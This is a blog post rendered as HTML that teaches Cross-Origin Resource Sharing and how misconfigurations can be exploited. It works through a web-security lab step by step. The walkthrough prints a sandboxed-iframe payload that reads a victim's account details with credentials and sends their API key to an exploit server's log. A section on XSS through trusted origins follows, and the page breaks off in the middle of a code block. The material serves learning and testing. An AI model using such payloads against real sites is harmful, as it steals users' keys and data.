<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Cross-Origin Resource Sharing (CORS)" />
<meta property="og:locale" content="en" />
<meta name="description" content="Introduction to Cross-Origin Resource Sharing (CORS)" />
<meta property="og:description" content="Introduction to Cross-Origin Resource Sharing (CORS)" />
<link rel="canonical" href="http://localhost:4000/posts/cors-guide" />
<meta property="og:url" content="http://localhost:4000/posts/cors-guide" />
<meta property="og:site_name" content="Diogo Lages" />
<meta property="og:image" content="http://localhost:4000/assets/img/thumbnails/cors-guide.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-02-23T00:00:00+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="http://localhost:4000/assets/img/thumbnails/cors-guide.png" />
<meta property="twitter:title" content="Cross-Origin Resource Sharing (CORS)" />
<meta name="twitter:site" content="@Diogo-Lages" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-02-26T20:27:14+00:00","datePublished":"2025-02-23T00:00:00+00:00","description":"Introduction to Cross-Origin Resource Sharing (CORS)","headline":"Cross-Origin Resource Sharing (CORS)","image":"http://localhost:4000/assets/img/thumbnails/cors-guide.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/cors-guide"},"url":"http://localhost:4000/posts/cors-guide"}</script>
<!-- End Jekyll SEO tag -->


  <title>Cross-Origin Resource Sharing (CORS) | Diogo Lages
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Diogo Lages">
<meta name="application-name" content="Diogo Lages">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/whoami.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">Diogo Lages</a>
    <p class="site-subtitle fst-italic mb-0">You can't keep it a secret, because you're a good man</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
        <a
          href="https://github.com/Diogo-Lages"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://www.linkedin.com/in/diogo-lages/"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
      

      
        <a
          href="https://tryhackme.com/p/DiogoLages"
          aria-label="link"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fas fa-user-secret"></i>
        </a>
      
    
      

      
        <a
          href="https://osintframework.com/"
          aria-label="link"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fas fa-fingerprint"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>Cross-Origin Resource Sharing (CORS)</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Cross-Origin Resource Sharing (CORS)</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1740268800"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Feb 23, 2025
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1740601634"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Feb 26, 2025
</time>

        </span>
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/thumbnails/cors-guide.png" class="popup img-link preview-img shimmer"><img src="/assets/img/thumbnails/cors-guide.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://twitter.com/diogo-lages">Diogo Lages</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="3010 words"
>
  <em>16 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Cross-Origin Resource Sharing (CORS)</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Cross-Origin Resource Sharing (CORS)</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h1 id="introduction-to-cross-origin-resource-sharing-cors">Introduction to Cross-Origin Resource Sharing (CORS)</h1>

<p>Cross-origin resource sharing (CORS) is a browser mechanism that enables controlled access to resources located outside of a given domain. It extends and adds flexibility to the <strong>same-origin policy (SOP)</strong>, which restricts how websites can interact with resources outside their source domain. While CORS provides greater flexibility for developers, it also introduces potential security risks if not configured properly.</p>

<h2 id="table-of-contents"><span class="me-2">Table of Contents</span><a href="#table-of-contents" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li><a href="#what-is-cors">What is CORS?</a></li>
  <li><a href="#same-origin-policy">Same-Origin Policy</a></li>
  <li><a href="#relaxation-of-the-same-origin-policy">Relaxation of the Same-Origin Policy</a></li>
  <li><a href="#vulnerabilities-arising-from-cors-misconfigurations">Vulnerabilities Arising from CORS Misconfigurations</a></li>
  <li><a href="#exploiting-cors-misconfigurations">Exploiting CORS Misconfigurations</a></li>
  <li><a href="#preventing-cors-based-attacks">Preventing CORS-Based Attacks</a></li>
  <li><a href="#key-takeaways">Key Takeaways</a></li>
</ol>

<hr />

<h2 id="what-is-cors"><span class="me-2">What is CORS?</span><a href="#what-is-cors" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CORS is a mechanism that allows servers to specify which external domains are permitted to access their resources. It uses HTTP headers to define trusted origins and associated properties, such as whether authenticated access is allowed. For example:</p>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="err">Access-Control-Allow-Origin: https://example.com
Access-Control-Allow-Credentials: true
</span></pre></td></tr></tbody></table></code></div></div>

<p>These headers enable cross-origin requests while maintaining some level of control over who can access the resources.</p>

<hr />

<h2 id="same-origin-policy"><span class="me-2">Same-Origin Policy</span><a href="#same-origin-policy" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The <strong>same-origin policy</strong> is a restrictive cross-origin specification designed to prevent malicious cross-domain interactions. It limits a website’s ability to interact with resources outside its source domain. For example:</p>

<ul>
  <li>A script on <code class="language-plaintext highlighter-rouge">https://example.com</code> cannot directly access resources on <code class="language-plaintext highlighter-rouge">https://another-example.com</code>.</li>
  <li>However, it can issue requests to other domains, but it cannot access the responses unless explicitly allowed by CORS.</li>
</ul>

<p>This policy was introduced to mitigate risks like one website stealing private data from another.</p>

<hr />

<h2 id="relaxation-of-the-same-origin-policy"><span class="me-2">Relaxation of the Same-Origin Policy</span><a href="#relaxation-of-the-same-origin-policy" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>While the same-origin policy is effective at preventing unauthorized access, it can be overly restrictive for modern web applications that need to interact with subdomains or third-party services. To address this, developers use <strong>cross-origin resource sharing (CORS)</strong> to relax the same-origin policy in a controlled manner.</p>

<p>CORS works by using a suite of HTTP headers that define trusted origins and permissions. For example:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code> header specifies which origins are allowed to access a resource.</li>
  <li>The <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Credentials</code> header determines whether cookies and authentication tokens can be included in cross-origin requests.</li>
</ul>

<hr />

<h2 id="vulnerabilities-arising-from-cors-misconfigurations"><span class="me-2">Vulnerabilities Arising from CORS Misconfigurations</span><a href="#vulnerabilities-arising-from-cors-misconfigurations" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Many modern websites use CORS to allow access from subdomains and trusted third parties. However, misconfigurations in CORS policies can lead to exploitable vulnerabilities. Common issues include:</p>

<ol>
  <li><strong>Reflecting Arbitrary Origins</strong>: Allowing any origin by reflecting the <code class="language-plaintext highlighter-rouge">Origin</code> header without validation can expose sensitive data to malicious websites.</li>
  <li><strong>Whitelist Implementation Errors</strong>: Misconfigured whitelists (e.g., using prefix or suffix matching) can lead to unintended access.</li>
  <li><strong>Null Origin Risks</strong>: Whitelisting the <code class="language-plaintext highlighter-rouge">null</code> origin can introduce vulnerabilities, especially in edge cases like file-based requests or sandboxed environments.</li>
</ol>

<hr />

<h2 id="exploiting-cors-misconfigurations"><span class="me-2">Exploiting CORS Misconfigurations</span><a href="#exploiting-cors-misconfigurations" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CORS misconfigurations can lead to serious vulnerabilities, allowing attackers to access sensitive data or perform unauthorized actions. Below, we’ll walk through a step-by-step process to exploit a misconfigured CORS policy.</p>

<h3 id="step-by-step-walkthrough-exploiting-cors-misconfigurations"><span class="me-2">Step-by-Step Walkthrough: Exploiting CORS Misconfigurations</span><a href="#step-by-step-walkthrough-exploiting-cors-misconfigurations" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h4 id="1-initial-setup-logging-in-and-observing-behavior"><span class="me-2"><strong>1. Initial Setup: Logging In and Observing Behavior</strong></span><a href="#1-initial-setup-logging-in-and-observing-behavior" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>
    <p><strong>Turn Off Intercept in Burp Suite</strong>:</p>

    <p>Ensure that intercept is turned off in Burp Suite so that your browser can communicate with the target application without interruptions.</p>
  </li>
  <li>
    <p><strong>Log In to Your Account</strong>:</p>

    <p>Use Burp’s built-in browser to log in to your account on the target application. Once logged in, navigate to the “My Account” page.</p>
  </li>
  <li>
    <p><strong>Inspect the AJAX Request</strong>:</p>

    <p>Open the <strong>HTTP history</strong> in Burp Suite and review the requests made when you access the “My Account” page. You should notice that your account details (including sensitive information like your API key) are retrieved via an <strong>AJAX request</strong> to the <code class="language-plaintext highlighter-rouge">/accountDetails</code> endpoint.</p>
  </li>
  <li>
    <p><strong>Check for CORS Headers</strong>:</p>

    <p>Look at the response headers for this request. Specifically, check for the presence of the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Credentials: true</code> header. This header indicates that the server supports CORS and allows credentials (like cookies) to be sent with cross-origin requests. This is a potential indicator that the server may have a misconfigured CORS policy.</p>
  </li>
</ul>

<h4 id="2-testing-the-cors-policy"><span class="me-2"><strong>2. Testing the CORS Policy</strong></span><a href="#2-testing-the-cors-policy" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>
    <p><strong>Send the Request to Burp Repeater</strong>:</p>

    <p>Right-click on the <code class="language-plaintext highlighter-rouge">/accountDetails</code> request in Burp’s HTTP history and select <strong>“Send to Repeater”</strong>. This allows you to manually modify and resend the request.</p>
  </li>
  <li>
    <p><strong>Add the <code class="language-plaintext highlighter-rouge">Origin: null</code> Header</strong>:</p>

    <p>In Burp Repeater, add a new header to the request:</p>

    <div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>Origin: null
</pre></td></tr></tbody></table></code></div>    </div>

    <p>This simulates a cross-origin request from a <code class="language-plaintext highlighter-rouge">null</code> origin, which can occur in certain edge cases (e.g., sandboxed iframes or file-based requests).</p>
  </li>
  <li>
    <p><strong>Resubmit the Request</strong>:</p>

    <p>Send the modified request and observe the server’s response. If the server reflects the <code class="language-plaintext highlighter-rouge">null</code> origin in the <code class="language-plaintext highlighter-rouge">Access-Control-Allow-Origin</code> header, it means the server is vulnerable to CORS misconfiguration. For example, the response might look like this:</p>

    <div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
</pre></td></tr></tbody></table></code></div>    </div>

    <p>This indicates that the server allows requests from the <code class="language-plaintext highlighter-rouge">null</code> origin and permits credentials (like cookies) to be included in those requests.</p>
  </li>
</ul>

<h4 id="3-crafting-the-exploit"><span class="me-2"><strong>3. Crafting the Exploit</strong></span><a href="#3-crafting-the-exploit" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>
    <p><strong>Go to the Exploit Server</strong>:</p>

    <p>In the lab environment, navigate to the <strong>exploit server</strong> provided for testing. This server allows you to host malicious HTML/JavaScript code.</p>
  </li>
  <li>
    <p><strong>Enter the Malicious HTML Code</strong>:</p>

    <p>Paste the following HTML code into the exploit server’s input field. Replace <code class="language-plaintext highlighter-rouge">YOUR-LAB-ID</code> with the unique URL of your lab instance and <code class="language-plaintext highlighter-rouge">YOUR-EXPLOIT-SERVER-ID</code> with the ID of your exploit server:</p>

    <div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;iframe</span> <span class="na">sandbox=</span><span class="s">"allow-scripts allow-top-navigation allow-forms"</span> <span class="na">src=</span><span class="s">"data:text/html,&lt;script&gt;
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+this.responseText;
    };
&lt;/script&gt;"</span><span class="nt">&gt;&lt;/iframe&gt;</span>
</pre></td></tr></tbody></table></code></div>    </div>

    <p><strong>Explanation of the Code</strong>:</p>

    <ul>
      <li>The <code class="language-plaintext highlighter-rouge">&lt;iframe&gt;</code> element uses the <code class="language-plaintext highlighter-rouge">sandbox</code> attribute to create a restricted environment. This generates a <code class="language-plaintext highlighter-rouge">null</code> origin for the request.</li>
      <li>Inside the iframe, JavaScript makes an AJAX request (<code class="language-plaintext highlighter-rouge">XMLHttpRequest</code>) to the <code class="language-plaintext highlighter-rouge">/accountDetails</code> endpoint of the target application.</li>
      <li>The <code class="language-plaintext highlighter-rouge">withCredentials = true</code> setting ensures that cookies (and thus the victim’s session) are included in the request.</li>
      <li>When the response is received, the <code class="language-plaintext highlighter-rouge">reqListener</code> function redirects the browser to the exploit server’s <code class="language-plaintext highlighter-rouge">/log</code> endpoint, appending the victim’s API key (or other sensitive data) as a query parameter in the URL.</li>
    </ul>
  </li>
</ul>

<h4 id="4-testing-the-exploit"><span class="me-2"><strong>4. Testing the Exploit</strong></span><a href="#4-testing-the-exploit" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>
    <p><strong>View the Exploit</strong>:</p>

    <p>Click the <strong>“View exploit”</strong> button on the exploit server. This simulates a victim visiting the malicious page.</p>
  </li>
  <li>
    <p><strong>Observe the Result</strong>:</p>

    <p>After viewing the exploit, you should be redirected to the <code class="language-plaintext highlighter-rouge">/log</code> page on the exploit server. Check the URL of the page—it should now include the victim’s API key as part of the query string. For example:</p>

    <div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key=VICTIM_API_KEY
</pre></td></tr></tbody></table></code></div>    </div>

    <p>This confirms that the exploit successfully retrieved the victim’s sensitive data.</p>
  </li>
</ul>

<h4 id="5-delivering-the-exploit-to-the-victim"><span class="me-2"><strong>5. Delivering the Exploit to the Victim</strong></span><a href="#5-delivering-the-exploit-to-the-victim" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<ul>
  <li>
    <p><strong>Deliver the Exploit</strong>:</p>

    <p>Once you’ve confirmed that the exploit works, click the <strong>“Deliver exploit to victim”</strong> button. This simulates sending the malicious link to the victim.</p>
  </li>
  <li>
    <p><strong>Access the Log</strong>:</p>

    <p>After delivering the exploit, go back to the exploit server and click <strong>“Access log”</strong>. The log will show the victim’s API key, which was captured when they visited the malicious page.</p>
  </li>
  <li>
    <p><strong>Submit the Key</strong>:</p>

    <p>Copy the victim’s API key and submit it to complete the lab.</p>
  </li>
</ul>

<hr />

<h2 id="exploiting-xss-via-cors-trust-relationships"><span class="me-2">Exploiting XSS via CORS Trust Relationships</span><a href="#exploiting-xss-via-cors-trust-relationships" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Even when CORS is “correctly” configured, it inherently establishes a <strong>trust relationship</strong> between two origins. If a website trusts an origin that is vulnerable to <strong>Cross-Site Scripting (XSS)</strong>, an attacker can exploit the XSS vulnerability to inject malicious JavaScript. This injected script can then use CORS to retrieve sensitive information from the trusted site.</p>

<h3 id="how-it-works"><span class="me-2">How It Works</span><a href="#how-it-works" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Consider the following request:</p>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nf">GET</span> <span class="nn">/api/requestApiKey</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">vulnerable-website.com</span>
<span class="na">Origin</span><span class="p">:</span> <span class="s">https://subdomain.vulnerable-website.com</span>
<span class="na">Cookie</span><span class="p">:</span> <span class="s">sessionid=...</span>
</pre></td></tr></tbody></table></code></div></div>

<p>If the server responds with:</p>

<div class="language-http highlighter-rouge"><div class="code-header">
        <span data-label-text="Http"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span>
<span class="na">Access-Control-Allow-Origin</span><span class="p">:</span> <span class="s">https://subdomain.vulnerable-website.com</span>
<span class="na">Access-Control-Allow-Credentials</span><span class="p">:</span> <span class="s">true</span>
</pre></td></tr></tbody></table></code></div></div>

<p>This response indicates that <code class="language-plaintext highlighter-rouge">vulnerable-website.com</code> trusts requests originating from <code class="language-plaintext highlighter-rouge">https://subdomain.vulnerable-website.com</code>. If an attacker discovers an XSS vulnerability on <code class="language-plaintext highlighter-rouge">subdomain.vulnerable-website.com</code>, they can exploit it to inject malicious JavaScript that uses CORS to retrieve sensitive data (e.g., API keys) from <code class="language-plaintext highlighter-rouge">vulnerable-website.com</code>.</p>

<p>For example, the attacker could craft a URL like this:</p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
